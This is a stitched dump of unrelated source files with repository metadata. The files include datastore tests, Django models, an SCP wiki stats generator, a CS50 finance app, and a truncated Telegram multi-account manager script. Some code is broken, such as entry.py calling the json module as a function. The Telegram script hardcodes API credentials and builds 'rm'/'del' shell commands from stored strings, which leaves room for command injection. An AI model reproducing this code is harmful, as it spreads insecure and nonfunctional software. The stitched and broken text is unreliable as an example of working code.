self.assertEqual(sds2.get(b), sds2.get(a))
sds2.put(a, 3)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), 3)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.delete(b)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
class TestDirectoryDatastore(TestDatastore):
def test_simple(self):
from ..basic import DirectoryDatastore
s1 = DirectoryDatastore(DictDatastore())
s2 = DirectoryDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestDatastoreCollection(TestDatastore):
def test_tiered(self):
from ..basic import TieredDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
ts = TieredDatastore([s1, s2, s3])
k1 = Key('1')
k2 = Key('2')
k3 = Key('3')
s1.put(k1, '1')
s2.put(k2, '2')
s3.put(k3, '3')
self.assertTrue(s1.contains(k1))
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertTrue(ts.contains(k1))
self.assertEqual(ts.get(k1), '1')
self.assertEqual(s1.get(k1), '1')
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertFalse(s1.contains(k2))
self.assertTrue(s2.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertTrue(ts.contains(k2))
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s1.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertEqual(ts.get(k2), '2')
self.assertEqual(s1.get(k2), '2')
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s3.contains(k2))
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertTrue(s3.contains(k3))
self.assertTrue(ts.contains(k3))
self.assertEqual(s3.get(k3), '3')
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertEqual(ts.get(k3), '3')
self.assertEqual(s1.get(k3), '3')
self.assertEqual(s2.get(k3), '3')
self.assertEqual(s3.get(k3), '3')
ts.delete(k1)
ts.delete(k2)
ts.delete(k3)
self.assertFalse(ts.contains(k1))
self.assertFalse(ts.contains(k2))
self.assertFalse(ts.contains(k3))
self.subtest_simple([ts])
def test_sharded(self, numelems=1000):
from ..basic import ShardedDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
s4 = DictDatastore()
s5 = DictDatastore()
stores = [s1, s2, s3, s4, s5]
        # map key names 0..numelems-1 evenly across the shards; integer division
        # keeps the result usable as a list index under Python 3
        hash = lambda key: int(key.name) * len(stores) // numelems
sharded = ShardedDatastore(stores, shardingfn=hash)
sumlens = lambda stores: sum(map(lambda s: len(s), stores))
def checkFor(key, value, sharded, shard=None):
correct_shard = sharded._stores[hash(key) % len(sharded._stores)]
for s in sharded._stores:
if shard and s == shard:
self.assertTrue(s.contains(key))
self.assertEqual(s.get(key), value)
else:
self.assertFalse(s.contains(key))
if correct_shard == shard:
self.assertTrue(sharded.contains(key))
self.assertEqual(sharded.get(key), value)
else:
self.assertFalse(sharded.contains(key))
self.assertEqual(sumlens(stores), 0)
# test all correct.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
        # ensure it's in the same spots.
        for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
        # ensure it's in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
sharded.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
        # ensure it's in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
if value % 2 == 0:
shard.delete(key)
else:
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
# try out adding it to the wrong shards.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
        # ensure it's in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
        # this won't do anything
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.delete(key)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.put(key, value)
incorrect_shard.delete(key)
checkFor(key, value, sharded, correct_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, correct_shard)
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
self.subtest_simple([sharded])
if __name__ == '__main__':
    unittest.main()
rooms/models.py | Neisvestney/SentSyncServer | 0 | 9149 | from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| none | 1 | 2.318539 | 2 |
|
colbert/parameters.py | techthiyanes/ColBERT | 421 | 9150 | import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
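
# --- Illustrative sketch (not part of the original module) ---
# Typical use of these constants inside a training loop; `save_checkpoint` is a
# placeholder for whatever checkpointing routine the trainer provides.
def _maybe_checkpoint(step, save_checkpoint):
    if step in SAVED_CHECKPOINTS:
        save_checkpoint(step)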
| import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| none | 1 | 2.070674 | 2 |
|
jarvis/stats.py | aburgd/sheila | 0 | 9151 | <reponame>aburgd/sheila
#!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
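# Illustrative note (not in the original module): the helper above renders
# simple one-level tags, e.g. html('span', 'admin', cls='rel-author')
# -> '<span class="rel-author">admin</span>'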
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
            emphasized = {'scp', 'tale', 'hub', 'admin', 'author'}
            tags = [html('b', t) if t in emphasized else t
                    for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url
| #!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url | de | 0.423372 | #!/usr/bin/env python3 ############################################################################### # Module Imports ############################################################################### ############################################################################### # Templates ############################################################################### google.charts.setOnLoadCallback({name}); function {name}() {{ var data = new google.visualization.arrayToDataTable([ {data} ]); var options = {options}; var chart = new google.visualization.{class_name}( document.getElementById('{name}')); chart.draw(data, options); }} [[html]] <base target="_parent" /> <style type="text/css"> @import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css); </style> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"> </script> <script type="text/javascript"> google.charts.load('current', {{'packages':['table', 'corechart']}}); {summary_table} {articles_chart} {articles_table} </script> <div id="summary_table"></div> <div id="articles_chart"></div> <div style="clear: both;"></div> <h4>Articles</h4> <div id="articles_table"></div> [[/html]] ############################################################################### # Helper Functions ############################################################################### ############################################################################### # Chart Classes ############################################################################### #db4437' #4285f4' #f4b400' ############################################################################### | 2.190594 | 2 |
entry.py | Allenyou1126/allenyou-acme.sh | 0 | 9152 | <filename>entry.py
#!/usr/bin/env python3
import json
from allenyoucert import Cert
def main():
    cert_list = list()
    # NOTE: the original line `a = json()` raises a TypeError because `json` is
    # a module, not a callable; parsing JSON text is the likely intent, so a
    # hedged placeholder call is used here.
    data = json.loads('{}')
    return cert_list, data


if __name__ == '__main__':
    main()
dynts/lib/fallback/simplefunc.py | quantmind/dynts | 57 | 9153 |
from .common import *
def tsminmax(v):
mv = NaN
xv = NaN
    for x in v:
        # NaN != NaN, so this comparison skips missing values
        if x == x:
if mv == mv:
mv = min(mv,x)
else:
mv = x
if xv == xv:
xv = max(xv,x)
else:
xv = x
return (mv,xv) |
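
# --- Illustrative sketch (not part of the original module) ---
# Demonstrates the NaN-skipping min/max logic above with plain floats;
# float('nan') stands in for the NaN imported from .common.
def _demo_tsminmax():
    series = [float('nan'), 3.0, 1.5, float('nan'), 7.25]
    lo = hi = float('nan')
    for x in series:
        if x == x:  # False for NaN, so missing values are skipped
            lo = min(lo, x) if lo == lo else x
            hi = max(hi, x) if hi == hi else x
    return lo, hi  # -> (1.5, 7.25)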
week9/finance/application.py | lcsm29/edx-harvard-cs50 | 0 | 9154 | import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
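
# --- Illustrative sketch (not part of the CS50 starter code) ---
# One possible shape for the quote() TODO above, using the lookup() and
# apology() helpers imported at the top; the "quote.html"/"quoted.html"
# templates are assumptions and would need to exist before wiring this in.
def _quote_sketch():
    if request.method == "POST":
        stock = lookup(request.form.get("symbol"))
        if not stock:
            return apology("invalid symbol", 400)
        return render_template("quoted.html", stock=stock)
    return render_template("quote.html")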
| import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| en | 0.909698 | # Configure application # Ensure templates are auto-reloaded # Ensure responses aren't cached # Custom filter # Configure session to use filesystem (instead of signed cookies) # Configure CS50 Library to use SQLite database # Make sure API key is set Show portfolio of stocks Buy shares of stock Show history of transactions Log user in # Forget any user_id # User reached route via POST (as by submitting a form via POST) # Ensure username was submitted # Ensure password was submitted # Query database for username # Ensure username exists and password is correct # Remember which user has logged in # Redirect user to home page # User reached route via GET (as by clicking a link or via redirect) Log user out # Forget any user_id # Redirect user to login form Get stock quote. Register user Sell shares of stock Handle error # Listen for errors | 2.288179 | 2 |
users/forms.py | iurykrieger96/alura-django | 0 | 9155 | <filename>users/forms.py
from django import forms
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
class UserForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
password = forms.CharField(required=True)
phone = forms.CharField(required=True)
name_company = forms.CharField(required=True)
def is_valid(self):
valid = True
if not super(UserForm, self).is_valid():
            self.add_erro('Please check the information provided')
valid = False
user_exists = User.objects.filter(username=self.data['name']).exists()
if user_exists:
            self.add_erro('User already exists')
valid = False
return valid
def add_erro(self, message):
self._errors.setdefault(forms.forms.NON_FIELD_ERRORS, ErrorList()).append(message)
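
# --- Illustrative usage sketch (not part of the original module) ---
# How a view might drive this form; the field names mirror the form above,
# while the create_user() step is an assumption about the intended flow.
def _example_register(post_data):
    form = UserForm(post_data)
    if not form.is_valid():
        return form.errors
    return User.objects.create_user(
        username=form.cleaned_data['name'],
        email=form.cleaned_data['email'],
        password=form.cleaned_data['password'],
    )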
| <filename>users/forms.py
python/manager.py | Kiku-Reise/vsmart | 0 | 9156 | from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
